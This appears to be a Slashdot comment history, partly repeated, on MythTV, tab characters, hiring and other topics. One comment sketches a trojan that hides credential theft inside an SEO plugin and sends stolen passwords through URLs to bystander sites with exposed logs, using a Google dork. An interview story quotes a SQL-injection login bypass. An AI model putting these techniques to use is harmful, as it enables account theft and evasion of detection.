Wasn't MythTV headed down this path for many years? The "all in one" solution...
Is that project dead now, replaced by all these other alternatives? I've used MythTV successfully for about 4 or 5 years, but I was thinking it's time to reinvest in my setup. Just not sure what's the best solution.
I don't think I'm looking to do anything too unconventional: DVR functionality, Music Jukebox, etc. Ideally it would be HD capable (mine isn't currently HD), and I like the idea of pulling stuff from the internet (besides just schedule information) - why not integrate with torrent downloading for the ultimate music and video library?
My question - do I even screw with MythTV anymore, or move onto something new?
You have that wrong. By definition something is worth what someone else is willing to pay for it.
It's not circular, it's the very definition.
Using your logic, all definitions are circular: A book is a printed work bounded by covers, which is a book, which is a printed work bounded by covers.
What's something worth? By definition, whatever somebody will pay for it.
The post claiming that HP paid $1 Billion more than it's worth is a paradox. By definition, it can't be correct.
Had they said "HP paid $1 Billion more than anyone else would have", they would have made more sense (but it, too, would have been incorrect).
Define a small coding project, deliverables and all, and bring in each candidate to complete it as a pre-interview. Then call back those that did the best job.
Problem solved?
I've done this, only had them solve the small coding project IN the interview.
Some people freeze under pressure. Some fakers are discovered. And some really good programmers come out of the mix.
Ten years ago, when SQL injections weren't so well known, I would have the candidate write a very small web application. I had a SQL table set up with 10 users, their passwords (in plain text), and one more piece of data. The goal of the app was for a user to be able to sign in, display their data, or update their data. And Admin could sign in and see everyone's data.
It's about a 30 minute challenge, given all the pieces that I pre-wrote for them. And then after the candidate inevitably wrote code with unsanitized data, I would sign into their application with a password of "' or '1'='1" to show them the flaw in their logic. If I had an engaging discussion with the candidate, and we both learned something, I knew they were a keeper.
It'd be interesting to have the candidate bring their own test. "Bring in a brief problem, and code the solution in front of me".... and provide the example above as a sample.
Require the user to do something more drastic for more dangerous approvals (as determined by a) the level of security being requested, b) whether it's a permanent or one-time request, c) whether it's signed.
Pressing OK in all cases doesn't seem to be the answer. Providing root password (as Linux does) isn't bad for more risky requests.
I have required users to key in the word "irreversible" in the past, as a drastic step to make sure they understood that the action they were about to take was permanent. That works better than just popping up the standard "OK" button.
no, I actually apply my program to my wife's cheeks. It's rouge.:)
Thanks for the polite correction. I appreciate learning my frequent mistakes in a non-business setting, especially those that are not caught by spell-checker.
Sure, it's better not to use your own PC, but it's still possible to do so.
I run the same "infection" on my PC as what's on all the other PC's. The only difference is that I don't "discard" the log file, I look at it. So my activities will look exactly like the infected PC, because I run the password retrieval program through the same infection. (... not that I have written this virus, mind you.)
Sounds like we're on the same page though. Always better to use proxies, internet cafes, and remote controlled PCs to retrieve the booty, if possible. The more intermediaries the better.
I think you missed the point that at headquarters you are doing the same actions that a compromised PC would be doing.
That's the cover. Sure, your actions would be logged, but so would the hundreds of thousands of compromised PCs. Your activity would be obscured through sheer quantity of people doing the same actions.
When writing Trojans like this, there are several considerations that this author failed on.
1) Obscuring the code, so that it lasts longer, even upon scrutiny of the source.
2) Obscuring the password delivery mechanism to reduce the likelihood of detection of the code execution.
3) Obscure the password retrieval, to reduce the likelihood that the perpetrator would be caught, even if the authorities discover the code.
Much has been written about item 1, obscuring code. But I haven't seen much research describing items 2 or 3.
If I were writing the code, I would integrate the password theft and remote delivery into the main purpose of the code. For instance, say you wrote a plug-in whose function was to report to the user some information retrieved from Google and other sites. e.g. "This plug-in helps with Search Engine Optimization, by reporting potential keywords that can be added to the web page to increase results". With that sort of purpose, hits to Google and other sites wouldn't be suspected.
Once I found a web server with a log file that was openly being displayed on the web, I'd pass the stolen information (stolen user name, stolen password, and site that this information can be used on) in the form of a URL, possibly encoding the payload information (I don't encode it below, for clarity).
Then my rouge program would request a few more pages from other sites that have open log files, just to obscure my activities, specifically requesting the log file page itself (and disposing of the results). I'll explain why this step is important later...
Example: Using my Google query above, I can see that bullyentertainment.com has its logfile exposed (sorry, bullyentertainment, you're just the first one on my list of hundreds of thousands of open logfiles). That means that my trojan horse can request a page on bullyentertainment.com, (like www.bullyentertainment.com/stolen_info?user=myuser&pwd=hunter2&site=gmail.com it will log my hit into that file - logging the stolen user name, password, and site information into a remote innocent bystander server. If my rouge program requests a page on bullyentertainment.com with some information encoded in the URL, I can effectively transfer the secret stolen information from the infected PC to an innocent bystander (bullyentertainment.com).
Then later, back at secret spy headquarters, I can use the same Google Query to locate log files that have my secret information in them, like www.bullyentertainment.com/logs/access.log which was a log file shown by my Google Query. I can follow the same pattern as the infected PC - first hit a page passing some URL containing secret information, and then retrieve the log file - so my activities ALSO look like an infected PC. But by retrieving the log file, I have retrieved all of the stolen passwords.
This technique is a way to pass stolen information back to the hacker without detection, by going through an intermediary. Because spy headquarters uses the same procedure as a hacked PC, it cannot easily be detected as the destination of the information. Use of proxies can further hinder attempts to catch the hacker. In a real hack, I'd encode the secret information, so that only I was able to easily decode it. But you get the idea.
PS If you test the above links, no harm, but your IP address will be logged (just as it is with any click), but it will be visible to other users on an exposed log file. No big deal, but I thought I'd mention it.
I don't see statute of limitations as an issue whatsoever.
You sign a contract, exchange some money, and gain ownership to something. You have absolutely no obligation to prove your ownership within five years.
I'm sure he contacted an attorney years ago, and has been waiting to play this card. Why not let Zuckerberg and all the FB employees work really hard to build something for you, and then come and take it if it's yours?
I have talked to ISP's before about legal issues (specifically, a hacking incident). I said "hey, there's a hacking incident coming from one of your IP addresses, and I need all the information that you have on the person."
Their questions: "Are the police involved?" and "Are you a network administrator?"
Since I answered the questions right ("No" and "Yes"), they gave me all the information. Had the police been involved, their instructions were to only provide information with a warrant.
The moral of the story is to ask for the information first, prior to getting the police involved.
Mod me up, so the guy sees this critical piece of information!
A real tab character is not n spaces, where n=enough spaces to get to the next tabstop. If people are implementing a "soft tab" as the equivalent of a keyboard macro that spaces n spaces, regardless of distance, they don't know what they're doing. It's not a tab.
There are in fact editors that convert tabs immediately to spaces. I can think of two different conventions here, and I've seen them both. One editor converts tabs to n spaces immediately moving you to the next tab stop. The other converts tab to n spaces where n is a fixed number (configurable, defaulting to 4 or 8, I forget).
The third method, which you allude to as your preferred method is to insert ASCII 9. That's all fine, but you still have the issue of how to display it. And either one of the two options above could be chosen (personally, I think that jumping to a tab-stop makes the most sense, and when I saw the other behavior - jumping ahead a fixed number of spaces, it seemed very non-intuitive.)
I have also seen the concept where an ASCII 9 is inserted, but then if backspace is entered, it will back you up only one space. So tab-tab-tab-backspace would take you one space to the left of the 3rd tab stop. This is actually the behavior that emulates an old typewriter, and is useful for "decimal tab stops" and "right justification tab stops". So, while it seems like odd behavior when considering how the file is stored, it actually best emulates the original tab intent. (The way this is implemented is that tab-tab-tab-backspace with tab stops every 8 positions would be stored as ASCII 9, ASCII 9, SPACE, SPACE, SPACE, SPACE, SPACE, SPACE, SPACE. The last tab is converted when you press backspace to be the right number of spaces, and then one is removed.)
Life would be simpler if a committee decided on one convention, but that's not how things are. There are many editors out there, and you can't guarantee what editor will be used to open your source code. The safest answer then is to avoid tabs!
The tool doesn't need to prompt you for "closeness level". It could just track who you post to, and then when you post a message or a photo, give you a list of contacts, and ask which ones you want to send to. It could sort the list based on frequency, and the people you are close to will filter to the top.
So use a REAL tab character in your code like $DIETY intended, and set your editor to "show tab character". We have wide screens now - there's NO excuse for using anything except a real tab any more.
Actually, there are several huge reasons for not using real tab.
1) Tab means different things to different people. Even when you spell it out, people interpret it differently. In the original sense (i.e. old Underwood typewriters, and the like), tab meant to release the carriage and let it move thanks to the spring, until it was stopped by a tab stop. This means that if you set your tab stop at position 5, and 60, and you pressed tab when positioned anywhere from position 1 to 4, it skipped to 5. Pressing tab when positioned at 5 through 59 (in this example) skipped you to position 60. So, in it's original sense, tab relied on tab stops (literally tiny "tabs" on the top of the typewriter). However, there are few standard document formats (especially for source code) that define the tab stops. You don't see a line in an ASCII or Unicode source code file that says "the tabs for this document are at position 5 and 60". There's no common convention for this.
So people invented arbitrary tab stop conventions. Like "tab stops are every 4 characters" or "tab stops are every 8 characters". But a small difference like this can change the meaning of your document! If you line up code and comments with "real tab characters" every 4 characters, and then someone opens your document with tab stops every eight characters, then the issue is NOT just that things are moved right. The issue is that things do not line up! If I create a nice comment section with a table explaining something, and use tab characters counting on a tab stop every 4 characters, and you open it with tab stops every 8 characters, the MEANING of the comments may change.
Example: /* Here is a table of all the fields and whether they are changed by this function:
[tab][tab]Passed to function[tab]Returned from function[tab]Changed by function [tab][tab]------------------[tab]----------------------[tab]------------------- A[tab][tab][space][space][space]Yes[tab][tab][tab][space][space][space]Yes longer[tab][tab][space][space][space]Yes
*/
These comments will mean different things depending on the tab stop assumptions!
2) The designers of some editors mis-understood how tab-stops worked, and instead, some made tabs equivalent to a fixed number of spaces. For instance, for some editors a tab is instantly interpreted as 4 spaces. But in the original definition of tabs, it was a "variable" amount of spacing, which took you to a predictable column. These are two vastly different concepts.
3) Those who are smart enough to realize that there is confusion are really annoyed by those who are clueless and inserting real tab characters without knowing that there's an issue.
Well seeing is believing, calculations can always be wrong;) Show a real picture of a proton and I am convinced (please no photoshopping on that picture grrr).
Here ya go: [ . ]
Actually, that is not only a "picture" of a proton, that is an actual proton. Simply eliminate everything that is not the proton in question, and you're left with a proton.
He lives in Indiana, that's punishment enough. They just got the internet like 3 years ago. This is coming from a former "hoosier" someone who escaped Kokomo, Indiana several years ago.
Give me a break. The first time I experienced the internet was in 1983, in Indiana. Yeah, not 3 years ago, 27 years ago.
OK, funny funny. But just to be a debugging Nazi, the "min" and "max" functions are used backwards in the code above. You have to "max" with 0 and "min" with 5, otherwise you just force the value to one extreme. It makes sense if you think about it.
Slashdot Mirror
Wasn't MythTV headed down this path for many years? The "all in one" solution...
Is that project dead now, replaced by all these other alternatives? I've used MythTV successfully for about 4 or 5 years, but I was thinking it's time to reinvest in my setup. Just not sure what's the best solution.
I don't think I'm looking to do anything too unconventional: DVR functionality, Music Jukebox, etc. Ideally it would be HD capable (mine isn't currently HD), and I like the idea of pulling stuff from the internet (besides just schedule information) - why not integrate with torrent downloading for the ultimate music and video library?
My question - do I even screw with MythTV anymore, or move onto something new?
All my money is invested in P = NP!
Too bad. Had you invested in something with the exclamation point moved 4 places to the left, you'd be golden!
I always thought "wince" was the worst product name since "Nova" was being sold to Spanish speaking countries (the car that "will not" go?).
But Windows Mobile Phone 7 (WiMP 7?) can join the pack.
You have that wrong. By definition something is worth what someone else is willing to pay for it.
It's not circular, it's the very definition.
Using your logic, all definitions are circular: A book is a printed work bounded by covers, which is a book, which is a printed work bounded by covers.
What's something worth?
By definition, whatever somebody will pay for it.
The post claiming that HP paid $1 Billion more than it's worth is a paradox. By definition, it can't be correct.
Had they said "HP paid $1 Billion more than anyone else would have", they would have made more sense (but it, too, would have been incorrect).
Define a small coding project, deliverables and all, and bring in each candidate to complete it as a pre-interview. Then call back those that did the best job.
Problem solved?
I've done this, only had them solve the small coding project IN the interview.
Some people freeze under pressure. Some fakers are discovered. And some really good programmers come out of the mix.
Ten years ago, when SQL injections weren't so well known, I would have the candidate write a very small web application. I had a SQL table set up with 10 users, their passwords (in plain text), and one more piece of data. The goal of the app was for a user to be able to sign in, display their data, or update their data. And Admin could sign in and see everyone's data.
It's about a 30 minute challenge, given all the pieces that I pre-wrote for them. And then after the candidate inevitably wrote code with unsanitized data, I would sign into their application with a password of "' or '1'='1" to show them the flaw in their logic. If I had an engaging discussion with the candidate, and we both learned something, I knew they were a keeper.
It'd be interesting to have the candidate bring their own test. "Bring in a brief problem, and code the solution in front of me". ... and provide the example above as a sample.
4 Insightful?
Did you mods even read this? Completely compromises the system from a remote location without internet connection?
Cmon!
HP paid $1.2 Billion. That's about $1 Billion more than it was really worth.
Something is worth what someone will pay for it. Therefore, HP paid what it's worth.
I have no doubt that there will be a positive ROI on the purchase.
How about:
Require the user to do something more drastic for more dangerous approvals (as determined by a) the level of security being requested, b) whether it's a permanent or one-time request, c) whether it's signed.
Pressing OK in all cases doesn't seem to be the answer.
Providing root password (as Linux does) isn't bad for more risky requests.
I have required users to key in the word "irreversible" in the past, as a drastic step to make sure they understood that the action they were about to take was permanent. That works better than just popping up the standard "OK" button.
no, I actually apply my program to my wife's cheeks. It's rouge. :)
Thanks for the polite correction. I appreciate learning my frequent mistakes in a non-business setting, especially those that are not caught by spell-checker.
Sure, it's better not to use your own PC, but it's still possible to do so.
I run the same "infection" on my PC as what's on all the other PC's. The only difference is that I don't "discard" the log file, I look at it. So my activities will look exactly like the infected PC, because I run the password retrieval program through the same infection. (... not that I have written this virus, mind you.)
Sounds like we're on the same page though. Always better to use proxies, internet cafes, and remote controlled PCs to retrieve the booty, if possible. The more intermediaries the better.
I think you missed the point that at headquarters you are doing the same actions that a compromised PC would be doing.
That's the cover. Sure, your actions would be logged, but so would the hundreds of thousands of compromised PCs. Your activity would be obscured through sheer quantity of people doing the same actions.
When writing Trojans like this, there are several considerations that this author failed on.
1) Obscuring the code, so that it lasts longer, even upon scrutiny of the source.
2) Obscuring the password delivery mechanism to reduce the likelihood of detection of the code execution.
3) Obscure the password retrieval, to reduce the likelihood that the perpetrator would be caught, even if the authorities discover the code.
Much has been written about item 1, obscuring code. But I haven't seen much research describing items 2 or 3.
If I were writing the code, I would integrate the password theft and remote delivery into the main purpose of the code. For instance, say you wrote a plug-in whose function was to report to the user some information retrieved from Google and other sites. e.g. "This plug-in helps with Search Engine Optimization, by reporting potential keywords that can be added to the web page to increase results". With that sort of purpose, hits to Google and other sites wouldn't be suspected.
Some of my hits to Google would be to locate an open log file, with a Google Query like this query: "get / http/1.1" 200 mozilla filetype:log
Once I found a web server with a log file that was openly being displayed on the web, I'd pass the stolen information (stolen user name, stolen password, and site that this information can be used on) in the form of a URL, possibly encoding the payload information (I don't encode it below, for clarity).
Then my rouge program would request a few more pages from other sites that have open log files, just to obscure my activities, specifically requesting the log file page itself (and disposing of the results). I'll explain why this step is important later...
Example: Using my Google query above, I can see that bullyentertainment.com has its logfile exposed (sorry, bullyentertainment, you're just the first one on my list of hundreds of thousands of open logfiles). That means that my trojan horse can request a page on bullyentertainment.com, (like www.bullyentertainment.com/stolen_info?user=myuser&pwd=hunter2&site=gmail.com it will log my hit into that file - logging the stolen user name, password, and site information into a remote innocent bystander server. If my rouge program requests a page on bullyentertainment.com with some information encoded in the URL, I can effectively transfer the secret stolen information from the infected PC to an innocent bystander (bullyentertainment.com).
Then later, back at secret spy headquarters, I can use the same Google Query to locate log files that have my secret information in them, like www.bullyentertainment.com/logs/access.log which was a log file shown by my Google Query. I can follow the same pattern as the infected PC - first hit a page passing some URL containing secret information, and then retrieve the log file - so my activities ALSO look like an infected PC. But by retrieving the log file, I have retrieved all of the stolen passwords.
This technique is a way to pass stolen information back to the hacker without detection, by going through an intermediary. Because spy headquarters uses the same procedure as a hacked PC, it cannot easily be detected as the destination of the information. Use of proxies can further hinder attempts to catch the hacker. In a real hack, I'd encode the secret information, so that only I was able to easily decode it. But you get the idea.
PS If you test the above links, no harm, but your IP address will be logged (just as it is with any click), but it will be visible to other users on an exposed log file. No big deal, but I thought I'd mention it.
I don't see statute of limitations as an issue whatsoever.
You sign a contract, exchange some money, and gain ownership to something. You have absolutely no obligation to prove your ownership within five years.
I'm sure he contacted an attorney years ago, and has been waiting to play this card. Why not let Zuckerberg and all the FB employees work really hard to build something for you, and then come and take it if it's yours?
I was kidding. But one can only hope something shuts down that huge pile of crap.
A proposed settlement.
I have talked to ISP's before about legal issues (specifically, a hacking incident). I said "hey, there's a hacking incident coming from one of your IP addresses, and I need all the information that you have on the person."
Their questions: "Are the police involved?" and "Are you a network administrator?"
Since I answered the questions right ("No" and "Yes"), they gave me all the information. Had the police been involved, their instructions were to only provide information with a warrant.
The moral of the story is to ask for the information first, prior to getting the police involved. Mod me up, so the guy sees this critical piece of information!
A real tab character is not n spaces, where n=enough spaces to get to the next tabstop. If people are implementing a "soft tab" as the equivalent of a keyboard macro that spaces n spaces, regardless of distance, they don't know what they're doing. It's not a tab.
There are in fact editors that convert tabs immediately to spaces. I can think of two different conventions here, and I've seen them both. One editor converts tabs to n spaces immediately moving you to the next tab stop. The other converts tab to n spaces where n is a fixed number (configurable, defaulting to 4 or 8, I forget).
The third method, which you allude to as your preferred method is to insert ASCII 9. That's all fine, but you still have the issue of how to display it. And either one of the two options above could be chosen (personally, I think that jumping to a tab-stop makes the most sense, and when I saw the other behavior - jumping ahead a fixed number of spaces, it seemed very non-intuitive.)
I have also seen the concept where an ASCII 9 is inserted, but then if backspace is entered, it will back you up only one space. So tab-tab-tab-backspace would take you one space to the left of the 3rd tab stop. This is actually the behavior that emulates an old typewriter, and is useful for "decimal tab stops" and "right justification tab stops". So, while it seems like odd behavior when considering how the file is stored, it actually best emulates the original tab intent. (The way this is implemented is that tab-tab-tab-backspace with tab stops every 8 positions would be stored as ASCII 9, ASCII 9, SPACE, SPACE, SPACE, SPACE, SPACE, SPACE, SPACE. The last tab is converted when you press backspace to be the right number of spaces, and then one is removed.)
Life would be simpler if a committee decided on one convention, but that's not how things are. There are many editors out there, and you can't guarantee what editor will be used to open your source code. The safest answer then is to avoid tabs!
This is news? How long has Guerrilla Warfare been around?
Seriously, it didn't work for the Wicked Witch of the West, why would it work for the Wicked Warmongers of the Middle East.
The tool doesn't need to prompt you for "closeness level". It could just track who you post to, and then when you post a message or a photo, give you a list of contacts, and ask which ones you want to send to. It could sort the list based on frequency, and the people you are close to will filter to the top.
Share with (check all that apply):
[ ] Wife, Mary
[ ] Sister, Betty click here to check this one and everyone above
[ ] Dad, Bob click here to check this one and everyone above
[ ] Mom. Irma click here to check this one and everyone above
[ ] Cousin, Fred click here to check this one and everyone above
[ ] Distant Cousin, Joe click here to check this one and everyone above
So use a REAL tab character in your code like $DIETY intended, and set your editor to "show tab character". We have wide screens now - there's NO excuse for using anything except a real tab any more.
Actually, there are several huge reasons for not using real tab.
1) Tab means different things to different people. Even when you spell it out, people interpret it differently. In the original sense (i.e. old Underwood typewriters, and the like), tab meant to release the carriage and let it move thanks to the spring, until it was stopped by a tab stop. This means that if you set your tab stop at position 5, and 60, and you pressed tab when positioned anywhere from position 1 to 4, it skipped to 5. Pressing tab when positioned at 5 through 59 (in this example) skipped you to position 60. So, in it's original sense, tab relied on tab stops (literally tiny "tabs" on the top of the typewriter). However, there are few standard document formats (especially for source code) that define the tab stops. You don't see a line in an ASCII or Unicode source code file that says "the tabs for this document are at position 5 and 60". There's no common convention for this.
So people invented arbitrary tab stop conventions. Like "tab stops are every 4 characters" or "tab stops are every 8 characters". But a small difference like this can change the meaning of your document! If you line up code and comments with "real tab characters" every 4 characters, and then someone opens your document with tab stops every eight characters, then the issue is NOT just that things are moved right. The issue is that things do not line up! If I create a nice comment section with a table explaining something, and use tab characters counting on a tab stop every 4 characters, and you open it with tab stops every 8 characters, the MEANING of the comments may change.
Example:
/* Here is a table of all the fields and whether they are changed by this function:
[tab][tab]Passed to function[tab]Returned from function[tab]Changed by function
[tab][tab]------------------[tab]----------------------[tab]-------------------
A[tab][tab][space][space][space]Yes[tab][tab][tab][space][space][space]Yes
longer[tab][tab][space][space][space]Yes
*/
These comments will mean different things depending on the tab stop assumptions!
2) The designers of some editors mis-understood how tab-stops worked, and instead, some made tabs equivalent to a fixed number of spaces. For instance, for some editors a tab is instantly interpreted as 4 spaces. But in the original definition of tabs, it was a "variable" amount of spacing, which took you to a predictable column. These are two vastly different concepts.
3) Those who are smart enough to realize that there is confusion are really annoyed by those who are clueless and inserting real tab characters without knowing that there's an issue.
augmented reality at its best.
Makes me think what other "natural augmented reality senses" are possible, or even already exist in other species.
I'm able to see stupid people at work all the time. Does that count?
Well seeing is believing, calculations can always be wrong ;) Show a real picture of a proton and I am convinced (please no photoshopping on that picture grrr).
Here ya go: [ . ]
Actually, that is not only a "picture" of a proton, that is an actual proton. Simply eliminate everything that is not the proton in question, and you're left with a proton.
See?
There's a saying or something about people not studying history...
I don't know the saying you refer to, but I'm sure it only applies to historians.
He lives in Indiana, that's punishment enough. They just got the internet like 3 years ago. This is coming from a former "hoosier" someone who escaped Kokomo, Indiana several years ago.
Give me a break. The first time I experienced the internet was in 1983, in Indiana. Yeah, not 3 years ago, 27 years ago.
Oh, and get off my lawn. kids. geesh.
I primarily used Latex in college, with an occasional use of Lambskin.
OK, funny funny. But just to be a debugging Nazi, the "min" and "max" functions are used backwards in the code above. You have to "max" with 0 and "min" with 5, otherwise you just force the value to one extreme. It makes sense if you think about it.
Mod Parent up, as evidence of Linus' Law.
Why have a test suite if you can just post your code to Slashdot?